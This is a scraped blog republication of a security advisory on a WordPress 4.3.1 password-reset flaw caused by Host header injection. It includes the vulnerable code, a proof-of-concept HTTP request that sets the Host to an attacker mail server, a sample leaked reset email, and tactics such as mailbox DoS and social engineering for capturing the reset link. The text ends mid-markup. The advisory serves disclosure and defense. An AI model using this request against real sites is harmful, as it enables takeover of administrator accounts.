{"id":7540,"date":"2017-05-04T14:19:13","date_gmt":"2017-05-04T22:19:13","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/05\/04\/news-1325\/"},"modified":"2017-05-04T14:19:13","modified_gmt":"2017-05-04T22:19:13","slug":"news-1325","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/05\/04\/news-1325\/","title":{"rendered":"SSD Advisory \u2013 WordPress Unauthorized Password Reset"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Wed, 03 May 2017 13:09:31 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3176\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3176');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describe Unauthorized Password Reset vulnerability found in WordPress version 4.3.1.<\/p>\n<p>WordPress is web software you can use to create a beautiful website or blog. We like to say that WordPress is both free and priceless at the same time. The core software is built by hundreds of community volunteers, and when you\u2019re ready for more there are thousands of plugins and themes available to transform your site into almost anything you can imagine. Over 60 million people have chosen WordPress to power the place on the web they call \u201chome\u201d \u2014 we\u2019d love you to join the family<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Dawid Golunski, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Responses<\/strong><br \/> We notified WordPress about the vulnerabilities back in June 2016, repeated attempts to re-establish contact and get some answers on the status of the patch for this vulnerability went unanswered. At this time there is no solution or workaround for this vulnerability.<\/p>\n<p><span id=\"more-3176\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> WordPress has a password reset feature that contains a vulnerability which might in some cases allow attackers to get hold of the password reset link without previous authentication. Such attack could lead to an attacker gaining unauthorized access to a victim&#8217;s WordPress account.<\/p>\n<p>The vulnerability stems from WordPress using untrusted data by default when creating a password reset e-mail that is supposed to be delivered only to the e-mail associated with the owner&#8217;s account.<\/p>\n<p>This can be observed in the following code snippet that creates a From email header before calling a PHP mail() function:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590ba8e0a79c8087963605\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;&#8212;[ wp-includes\/pluggable.php ]&#8212;&#8212;    &#8230;    if ( !isset( $from_email ) ) {  \t\/\/ Get the site domain and get rid of www.  \t$sitename = strtolower( $_SERVER[&#8216;SERVER_NAME&#8217;] );  \tif ( substr( $sitename, 0, 4 ) == &#8216;www.&#8217; ) {  \t\t$sitename = substr( $sitename, 4 );  \t}    \t$from_email = &#8216;wordpress@&#8217; . $sitename;  }    &#8230;    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0027 seconds] -->  <\/p>\n<p>As we can see, WordPress is using <em>SERVER_NAME<\/em> variable to get the hostname of the server in order to create a <em>From\/Return-Path<\/em> header of the outgoing password reset email.<\/p>\n<p>However, major web servers such as <em>Apache<\/em> by default set the <em>SERVER_NAME<\/em> variable to the <em>HTTP_HOST<\/em> header, which can normally be supplied by a user in a HTTP request.<\/p>\n<p>Because <em>SERVER_NAME<\/em> can be modified, an attacker could send a specially crafted request to trick the password reset script into sending a password reset e-mail to any WordPress user, such as the administrator, with the From\/Return-Path field set to an email with the server of his choice e.g.:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590ba8e0a79d3919118174\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> wordpress@attackers-mxserver.com<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79d3919118174-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79d3919118174-1\"><span class=\"crayon-v\">wordpress<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">attackers<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">mxserver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">com<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>If the local mail server allows relay of email with arbitrary domains, originating from the localhost, and an email gets sent to the victim WordPress user with such <em>From\/Return-Path<\/em> header set. Then the attacker could possibly get hold of the password reset information via multiple ways:<\/p>\n<ul>\n<li>Local mail-server decides to return the email to the sender because of some error<\/li>\n<li>By performing a DoS attack on the victim&#8217;s email account (e.g by sending multiple large files to exceed user&#8217;s disk quota) in order to cause the password reset email sent to be rejected and thus returned to the attacker&#8217;s email.<\/li>\n<li>Some auto-responders might attach a copy of the email sent in an automatic reply, depending on the implementation they might use <em>From\/Return-Path<\/em> header to send a reply to<\/li>\n<li>Social engineer the victim to reply, or send multiple password reset emails to force him to reply<\/li>\n<\/ul>\n<p>Attacker could also trigger a password reset (with malicious headers set) on different WordPress account by brute-forcing, hoping to find a WordPress account that has an expired\/deactivated e-mail account associated with it. Which can true for some employees who got their mailbox deleted when they left the company but the administrator forgot to remove their WordPress accounts etc. In such case, a password reset email sent to a non-existing email account, would go straight back to the attacker.<\/p>\n<p>As to which e-mail header the attacker would be able to modify &#8211; From or Return-Path, it depends on the hosting environment. The From header sets also<br \/> Return-Path under Windows. It is also important to note that an attacker would be able to set both of the headers, irrelevant of the hosting environment, if the e-mail transport has been changed from using PHP <em>mail()<\/em> function to SMTP.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>If an attacker sends a request similar to the one below to a default WordPress installation that is accessible by the IP address (IP-based vhost):<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590ba8e0a79d7072792244\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;&#8211;[ HTTP Request ]&#8212;-    POST \/wp\/wordpress\/wp-login.php?action=lostpassword HTTP\/1.1  Host: injected-attackers-mxserver.com  Referer: http:\/\/wp-server\/wp\/wordpress\/wp-login.php?action=lostpassword  Content-Type: application\/x-www-form-urlencoded  Content-Length: 56    user_login=admin&amp;redirect_to=&amp;wp-submit=Get+New+Password    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79d7072792244-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79d7072792244-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79d7072792244-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79d7072792244-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79d7072792244-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79d7072792244-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79d7072792244-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79d7072792244-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79d7072792244-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79d7072792244-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79d7072792244-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79d7072792244-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HTTP <\/span><span class=\"crayon-i\">Request<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79d7072792244-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79d7072792244-3\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">wp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">wordpress<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">wp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">login<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">lostpassword <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79d7072792244-4\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">injected<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">attackers<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">mxserver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">com<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79d7072792244-5\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/wp-server\/wp\/wordpress\/wp-login.php?action=lostpassword<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79d7072792244-6\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">urlencoded<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79d7072792244-7\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">56<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79d7072792244-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79d7072792244-9\"><span class=\"crayon-v\">user_login<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">redirect_to<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">wp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">submit<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Get<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-r\">New<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">Password<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79d7072792244-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79d7072792244-11\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0015 seconds] -->  <\/p>\n<p>WordPress will trigger the password reset function for the admin user account.<\/p>\n<p>Because of the modified <em>HOST<\/em> header, the <em>SERVER_NAME<\/em> will get overwritten with the hostname of attacker&#8217;s choice. As a result, WordPress will pass the following headers and email body to the<em>\/usr\/bin\/sendmail<\/em> wrapper:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590ba8e0a79da949265461\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;&#8212;[ resulting e-mail ]&#8212;&#8211;    To: victimadmin@admins-mailserver.com  Subject: [CompanyX WP] Password Reset  Return-Path: &amp;lt;wordpress@attackers-mxserver.com&amp;gt;  From: WordPress &amp;lt;wordpress@attackers-mxserver.com&amp;gt;  Message-ID: &amp;lt;e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com&amp;gt;  X-Priority: 3  MIME-Version: 1.0  Content-Type: text\/plain; charset=UTF-8  Content-Transfer-Encoding: 8bit       Someone requested that the password be reset for the following account:    http:\/\/companyX-wp\/wp\/wordpress\/    Username: admin    If this was a mistake, just ignore this email and nothing will happen.    To reset your password, visit the following address:    &lt;http:\/\/companyX-wp\/wp\/wordpress\/wp-login.php?action=rp&amp;key=AceiMFmkMR4fsmwxIZtZ&amp;login=admin&gt;    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79da949265461-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79da949265461-26\">26<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">resulting<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">mail<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-3\"><span class=\"crayon-st\">To<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">victimadmin<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">admins<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">mailserver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">com<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-4\"><span class=\"crayon-v\">Subject<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-e\">CompanyX <\/span><span class=\"crayon-v\">WP<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Password <\/span><span class=\"crayon-e\">Reset<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-5\"><span class=\"crayon-st\">Return<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Path<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">lt<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">wordpress<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">attackers<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">mxserver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">com<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">gt<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-6\"><span class=\"crayon-v\">From<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WordPress<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">lt<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">wordpress<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">attackers<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">mxserver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">com<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">gt<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-7\"><span class=\"crayon-v\">Message<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">ID<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">lt<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">e6fd614c5dd8a1c604df2a732eb7b016<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">attackers<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">mxserver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">com<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">gt<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-8\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Priority<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-9\"><span 